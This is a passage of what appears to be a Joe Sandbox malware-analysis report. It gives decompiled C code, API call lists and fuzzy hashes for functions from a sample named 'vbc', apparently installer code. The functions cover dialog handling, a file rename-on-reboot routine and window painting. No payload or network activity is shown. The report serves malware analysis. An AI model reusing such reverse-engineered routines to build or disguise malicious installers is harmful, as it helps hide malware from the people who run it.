                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 2564846305-813528018
                    • Opcode ID: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
                    • Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
                    • Opcode Fuzzy Hash: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
                    • Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                    				intOrPtr _v8;
                    				int _v12;
                    				void* _v16;
                    				struct HWND__* _t56;
                    				intOrPtr _t69;
                    				signed int _t75;
                    				signed short* _t76;
                    				signed short* _t78;
                    				long _t92;
                    				int _t103;
                    				signed int _t108;
                    				signed int _t110;
                    				intOrPtr _t113;
                    				WCHAR* _t114;
                    				signed int* _t116;
                    				WCHAR* _t117;
                    				struct HWND__* _t118;
                    
                    				if(_a8 != 0x110) {
                    					__eflags = _a8 - 0x111;
                    					if(_a8 != 0x111) {
                    						L13:
                    						__eflags = _a8 - 0x4e;
                    						if(_a8 != 0x4e) {
                    							__eflags = _a8 - 0x40b;
                    							if(_a8 == 0x40b) {
                    								 *0x79ff14 =  *0x79ff14 + 1;
                    								__eflags =  *0x79ff14;
                    							}
                    							L27:
                    							_t114 = _a16;
                    							L28:
                    							return E004044DD(_a8, _a12, _t114);
                    						}
                    						_t56 = GetDlgItem(_a4, 0x3e8);
                    						_t114 = _a16;
                    						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                    						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                    							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                    							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                    								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                    								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                    								_v12 = _t103;
                    								__eflags = _t103 - _t113 - 0x800;
                    								_v16 = _t113;
                    								_v8 = 0x7a6a00;
                    								if(_t103 - _t113 < 0x800) {
                    									SendMessageW(_t56, 0x44b, 0,  &_v16);
                    									SetCursor(LoadCursorW(0, 0x7f02));
                    									_push(1);
                    									E004048E4(_a4, _v8);
                    									SetCursor(LoadCursorW(0, 0x7f00));
                    									_t114 = _a16;
                    								}
                    							}
                    						}
                    						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                    						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                    							goto L28;
                    						} else {
                    							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                    							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                    								goto L28;
                    							}
                    							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                    								SendMessageW( *0x7a8a68, 0x111, 1, 0);
                    							}
                    							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                    								SendMessageW( *0x7a8a68, 0x10, 0, 0);
                    							}
                    							return 1;
                    						}
                    					}
                    					__eflags = _a12 >> 0x10;
                    					if(_a12 >> 0x10 != 0) {
                    						goto L27;
                    					}
                    					__eflags =  *0x79ff14; // 0x0
                    					if(__eflags != 0) {
                    						goto L27;
                    					}
                    					_t69 =  *0x7a0f20; // 0x9f0f84
                    					_t29 = _t69 + 0x14; // 0x9f0f98
                    					_t116 = _t29;
                    					__eflags =  *_t116 & 0x00000020;
                    					if(( *_t116 & 0x00000020) == 0) {
                    						goto L27;
                    					}
                    					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                    					__eflags = _t108;
                    					 *_t116 = _t108;
                    					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                    					E004048C0();
                    					goto L13;
                    				} else {
                    					_t117 = _a16;
                    					_t75 =  *(_t117 + 0x30);
                    					if(_t75 < 0) {
                    						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
                    					}
                    					_t76 =  *0x7a8a98 + _t75 * 2;
                    					_t110 =  *_t76 & 0x0000ffff;
                    					_a8 = _t110;
                    					_t78 =  &(_t76[1]);
                    					_a16 = _t78;
                    					_v16 = _t78;
                    					_v12 = 0;
                    					_v8 = E004045E6;
                    					if(_t110 != 2) {
                    						_v8 = E004045AC;
                    					}
                    					_push( *((intOrPtr*)(_t117 + 0x34)));
                    					_push(0x22);
                    					E00404476(_a4);
                    					_push( *((intOrPtr*)(_t117 + 0x38)));
                    					_push(0x23);
                    					E00404476(_a4);
                    					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                    					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                    					_t118 = GetDlgItem(_a4, 0x3e8);
                    					E004044AB(_t118);
                    					SendMessageW(_t118, 0x45b, 1, 0);
                    					_t92 =  *( *0x7a8a70 + 0x68);
                    					if(_t92 < 0) {
                    						_t92 = GetSysColor( ~_t92);
                    					}
                    					SendMessageW(_t118, 0x443, 0, _t92);
                    					SendMessageW(_t118, 0x445, 0, 0x4010000);
                    					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                    					 *0x79ff14 = 0;
                    					SendMessageW(_t118, 0x449, _a8,  &_v16);
                    					 *0x79ff14 = 0;
                    					return 0;
                    				}
                    			}




















                    0x00404647
                    0x00404767
                    0x00404774
                    0x004047d1
                    0x004047d1
                    0x004047d5
                    0x0040489b
                    0x004048a2
                    0x004048a4
                    0x004048a4
                    0x004048a4
                    0x004048aa
                    0x004048aa
                    0x004048ad
                    0x00000000
                    0x004048b4
                    0x004047e3
                    0x004047e9
                    0x004047ec
                    0x004047f3
                    0x004047f5
                    0x004047fc
                    0x004047fe
                    0x00404801
                    0x00404804
                    0x00404809
                    0x0040480f
                    0x00404812
                    0x00404819
                    0x00404826
                    0x00404837
                    0x0040483d
                    0x00404845
                    0x00404853
                    0x00404859
                    0x00404859
                    0x00404819
                    0x004047fc
                    0x0040485c
                    0x00404863
                    0x00000000
                    0x00404865
                    0x00404865
                    0x0040486c
                    0x00000000
                    0x00000000
                    0x0040486e
                    0x00404872
                    0x00404882
                    0x00404882
                    0x00404884
                    0x00404888
                    0x00404894
                    0x00404894
                    0x00000000
                    0x00404898
                    0x00404863
                    0x0040477c
                    0x0040477f
                    0x00000000
                    0x00000000
                    0x00404785
                    0x0040478b
                    0x00000000
                    0x00000000
                    0x00404791
                    0x00404796
                    0x00404796
                    0x00404799
                    0x0040479c
                    0x00000000
                    0x00000000
                    0x004047c3
                    0x004047c3
                    0x004047c5
                    0x004047c7
                    0x004047cc
                    0x00000000
                    0x0040464d
                    0x0040464d
                    0x00404650
                    0x00404655
                    0x00404666
                    0x00404666
                    0x0040466e
                    0x00404671
                    0x00404675
                    0x00404678
                    0x0040467c
                    0x0040467f
                    0x00404682
                    0x00404685
                    0x0040468c
                    0x0040468e
                    0x0040468e
                    0x00404698
                    0x004046a5
                    0x004046af
                    0x004046b4
                    0x004046b7
                    0x004046bc
                    0x004046d3
                    0x004046da
                    0x004046ed
                    0x004046f0
                    0x00404704
                    0x0040470b
                    0x00404710
                    0x00404715
                    0x00404715
                    0x00404723
                    0x00404731
                    0x00404743
                    0x00404748
                    0x00404758
                    0x0040475a
                    0x00000000
                    0x00404760

                    APIs
                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
                    • GetDlgItem.USER32(?,000003E8), ref: 004046E7
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
                    • GetSysColor.USER32 ref: 00404715
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
                    • lstrlenW.KERNEL32(?), ref: 00404736
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
                    • GetDlgItem.USER32(?,0000040A), ref: 004047B1
                    • SendMessageW.USER32(00000000), ref: 004047B8
                    • GetDlgItem.USER32(?,000003E8), ref: 004047E3
                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
                    • LoadCursorW.USER32 ref: 00404834
                    • SetCursor.USER32(00000000), ref: 00404837
                    • LoadCursorW.USER32 ref: 00404850
                    • SetCursor.USER32(00000000), ref: 00404853
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                    • String ID: Call$N
                    • API String ID: 3103080414-3438112850
                    • Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                    • Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
                    • Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                    • Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406160(void* __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				long _t12;
                    				long _t24;
                    				char* _t31;
                    				int _t37;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				long _t42;
                    				WCHAR* _t44;
                    				void* _t46;
                    				void* _t48;
                    				void* _t49;
                    				void* _t52;
                    				void* _t53;
                    
                    				_t38 = __ecx;
                    				_t44 =  *(_t52 + 0x14);
                    				 *0x7a55e8 = 0x55004e;
                    				 *0x7a55ec = 0x4c;
                    				if(_t44 == 0) {
                    					L3:
                    					_t2 = _t52 + 0x1c; // 0x7a5de8
                    					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
                    						_t53 = _t52 + 0x10;
                    						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
                    						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
                    						_t48 = _t12;
                    						 *(_t53 + 0x18) = _t48;
                    						if(_t48 != 0xffffffff) {
                    							_t42 = GetFileSize(_t48, 0);
                    							_t6 = _t37 + 0xa; // 0xa
                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                    							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
                    								L18:
                    								return CloseHandle(_t48);
                    							} else {
                    								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
                    									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
                    									if(_t49 == 0) {
                    										_t48 =  *(_t53 + 0x18);
                    										L16:
                    										_t24 = _t42;
                    										L17:
                    										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
                    										SetFilePointer(_t48, 0, 0, 0);
                    										E004060BC(_t48, _t46, _t42 + _t37);
                    										GlobalFree(_t46);
                    										goto L18;
                    									}
                    									_t39 = _t46 + _t42;
                    									_t31 = _t39 + _t37;
                    									while(_t39 > _t49) {
                    										 *_t31 =  *_t39;
                    										_t31 = _t31 - 1;
                    										_t39 = _t39 - 1;
                    									}
                    									_t24 = _t49 - _t46 + 1;
                    									_t48 =  *(_t53 + 0x18);
                    									goto L17;
                    								}
                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                    								_t42 = _t42 + 0xa;
                    								goto L16;
                    							}
                    						}
                    					}
                    				} else {
                    					CloseHandle(E0040600A(_t44, 0, 1));
                    					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						goto L3;
                    					}
                    				}
                    				return _t12;
                    			}



















                    0x00406160
                    0x00406169
                    0x00406170
                    0x0040617a
                    0x0040618e
                    0x004061b6
                    0x004061bd
                    0x004061c1
                    0x004061c5
                    0x004061e5
                    0x004061ec
                    0x004061f6
                    0x00406203
                    0x00406208
                    0x0040620d
                    0x00406211
                    0x00406220
                    0x00406222
                    0x0040622f
                    0x00406233
                    0x004062ce
                    0x00000000
                    0x00406249
                    0x00406256
                    0x0040627a
                    0x0040627e
                    0x0040629d
                    0x004062a1
                    0x004062a1
                    0x004062a3
                    0x004062ac
                    0x004062b7
                    0x004062c2
                    0x004062c8
                    0x00000000
                    0x004062c8
                    0x00406280
                    0x00406283
                    0x0040628e
                    0x0040628a
                    0x0040628c
                    0x0040628d
                    0x0040628d
                    0x00406295
                    0x00406297
                    0x00000000
                    0x00406297
                    0x00406261
                    0x00406267
                    0x00000000
                    0x00406267
                    0x00406233
                    0x00406211
                    0x00406190
                    0x0040619b
                    0x004061a4
                    0x004061a8
                    0x00000000
                    0x00000000
                    0x004061a8
                    0x004062d9

                    APIs
                    • CloseHandle.KERNEL32(00000000), ref: 0040619B
                    • GetShortPathNameW.KERNEL32 ref: 004061A4
                      • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                      • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                    • GetShortPathNameW.KERNEL32 ref: 004061C1
                    • wsprintfA.USER32 ref: 004061DF
                    • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                    • GlobalFree.KERNEL32(00000000), ref: 004062C8
                    • CloseHandle.KERNEL32(00000000), ref: 004062CF
                      • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                      • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                    • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                    • API String ID: 2171350718-2304911260
                    • Opcode ID: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                    • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                    • Opcode Fuzzy Hash: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                    • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                    				struct tagLOGBRUSH _v16;
                    				struct tagRECT _v32;
                    				struct tagPAINTSTRUCT _v96;
                    				struct HDC__* _t70;
                    				struct HBRUSH__* _t87;
                    				struct HFONT__* _t94;
                    				long _t102;
                    				signed int _t126;
                    				struct HDC__* _t128;
                    				intOrPtr _t130;
                    
                    				if(_a8 == 0xf) {
                    					_t130 =  *0x7a8a70;
                    					_t70 = BeginPaint(_a4,  &_v96);
                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                    					_a8 = _t70;
                    					GetClientRect(_a4,  &_v32);
                    					_t126 = _v32.bottom;
                    					_v32.bottom = _v32.bottom & 0x00000000;
                    					while(_v32.top < _t126) {
                    						_a12 = _t126 - _v32.top;
                    						asm("cdq");
                    						asm("cdq");
                    						asm("cdq");
                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                    						_t87 = CreateBrushIndirect( &_v16);
                    						_v32.bottom = _v32.bottom + 4;
                    						_a16 = _t87;
                    						FillRect(_a8,  &_v32, _t87);
                    						DeleteObject(_a16);
                    						_v32.top = _v32.top + 4;
                    					}
                    					if( *(_t130 + 0x58) != 0xffffffff) {
                    						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                    						_a16 = _t94;
                    						if(_t94 != 0) {
                    							_t128 = _a8;
                    							_v32.left = 0x10;
                    							_v32.top = 8;
                    							SetBkMode(_t128, 1);
                    							SetTextColor(_t128,  *(_t130 + 0x58));
                    							_a8 = SelectObject(_t128, _a16);
                    							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
                    							SelectObject(_t128, _a8);
                    							DeleteObject(_a16);
                    						}
                    					}
                    					EndPaint(_a4,  &_v96);
                    					return 0;
                    				}
                    				_t102 = _a16;
                    				if(_a8 == 0x46) {
                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                    					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
                    				}
                    				return DefWindowProcW(_a4, _a8, _a12, _t102);
                    			}













                    0x0040100a
                    0x00401039
                    0x00401047
                    0x0040104d
                    0x00401051
                    0x0040105b
                    0x00401061
                    0x00401064
                    0x004010f3
                    0x00401089
                    0x0040108c
                    0x004010a6
                    0x004010bd
                    0x004010cc
                    0x004010cf
                    0x004010d5
                    0x004010d9
                    0x004010e4
                    0x004010ed
                    0x004010ef
                    0x004010ef
                    0x00401100
                    0x00401105
                    0x0040110d
                    0x00401110
                    0x00401112
                    0x00401118
                    0x0040111f
                    0x00401126
                    0x00401130
                    0x00401142
                    0x00401156
                    0x00401160
                    0x00401165
                    0x00401165
                    0x00401110
                    0x0040116e
                    0x00000000
                    0x00401178
                    0x00401010
                    0x00401013
                    0x00401015
                    0x0040101f
                    0x0040101f
                    0x00000000

                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                    • Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
                    • Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                    • Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                    				struct _ITEMIDLIST* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _t44;
                    				WCHAR* _t45;
                    				signed char _t47;
                    				signed int _t48;
                    				short _t59;
                    				short _t61;
                    				short _t63;
                    				void* _t71;
                    				signed int _t77;
                    				signed int _t78;
                    				short _t81;
                    				short _t82;
                    				signed char _t84;
                    				signed int _t85;
                    				void* _t98;
                    				void* _t104;
                    				intOrPtr* _t105;
                    				void* _t107;
                    				WCHAR* _t108;
                    				void* _t110;
                    
                    				_t107 = __esi;
                    				_t104 = __edi;
                    				_t71 = __ebx;
                    				_t44 = _a8;
                    				if(_t44 < 0) {
                    					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
                    				}
                    				_push(_t71);
                    				_push(_t107);
                    				_push(_t104);
                    				_t105 =  *0x7a8a98 + _t44 * 2;
                    				_t45 = 0x7a6a00;
                    				_t108 = 0x7a6a00;
                    				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
                    					_t108 = _a4;
                    					_a4 = _a4 & 0x00000000;
                    				}
                    				_t81 =  *_t105;
                    				_a8 = _t81;
                    				if(_t81 == 0) {
                    					L43:
                    					 *_t108 =  *_t108 & 0x00000000;
                    					if(_a4 == 0) {
                    						return _t45;
                    					}
                    					return E0040651A(_a4, _t45);
                    				} else {
                    					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                    						_t98 = 2;
                    						_t105 = _t105 + _t98;
                    						if(_t81 >= 4) {
                    							if(__eflags != 0) {
                    								 *_t108 = _t81;
                    								_t108 = _t108 + _t98;
                    								__eflags = _t108;
                    							} else {
                    								 *_t108 =  *_t105;
                    								_t108 = _t108 + _t98;
                    								_t105 = _t105 + _t98;
                    							}
                    							L42:
                    							_t82 =  *_t105;
                    							_a8 = _t82;
                    							if(_t82 != 0) {
                    								_t81 = _a8;
                    								continue;
                    							}
                    							goto L43;
                    						}
                    						_t84 =  *((intOrPtr*)(_t105 + 1));
                    						_t47 =  *_t105;
                    						_t48 = _t47 & 0x000000ff;
                    						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                    						_t85 = _t84 & 0x000000ff;
                    						_v28 = _t48 | 0x00008000;
                    						_t77 = 2;
                    						_v16 = _t85;
                    						_t105 = _t105 + _t77;
                    						_v24 = _t48;
                    						_v20 = _t85 | 0x00008000;
                    						if(_a8 != _t77) {
                    							__eflags = _a8 - 3;
                    							if(_a8 != 3) {
                    								__eflags = _a8 - 1;
                    								if(__eflags == 0) {
                    									__eflags = (_t48 | 0xffffffff) - _v12;
                    									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                    								}
                    								L38:
                    								_t108 =  &(_t108[lstrlenW(_t108)]);
                    								_t45 = 0x7a6a00;
                    								goto L42;
                    							}
                    							_t78 = _v12;
                    							__eflags = _t78 - 0x1d;
                    							if(_t78 != 0x1d) {
                    								__eflags = (_t78 << 0xb) + 0x7a9000;
                    								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
                    							} else {
                    								E00406461(_t108,  *0x7a8a68);
                    							}
                    							__eflags = _t78 + 0xffffffeb - 7;
                    							if(__eflags < 0) {
                    								L29:
                    								E004067A1(_t108);
                    							}
                    							goto L38;
                    						}
                    						if( *0x7a8ae4 != 0) {
                    							_t77 = 4;
                    						}
                    						_t121 = _t48;
                    						if(_t48 >= 0) {
                    							__eflags = _t48 - 0x25;
                    							if(_t48 != 0x25) {
                    								__eflags = _t48 - 0x24;
                    								if(_t48 == 0x24) {
                    									GetWindowsDirectoryW(_t108, 0x400);
                    									_t77 = 0;
                    								}
                    								while(1) {
                    									__eflags = _t77;
                    									if(_t77 == 0) {
                    										goto L26;
                    									}
                    									_t59 =  *0x7a8a64;
                    									_t77 = _t77 - 1;
                    									__eflags = _t59;
                    									if(_t59 == 0) {
                    										L22:
                    										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                    										__eflags = _t61;
                    										if(_t61 != 0) {
                    											L24:
                    											 *_t108 =  *_t108 & 0x00000000;
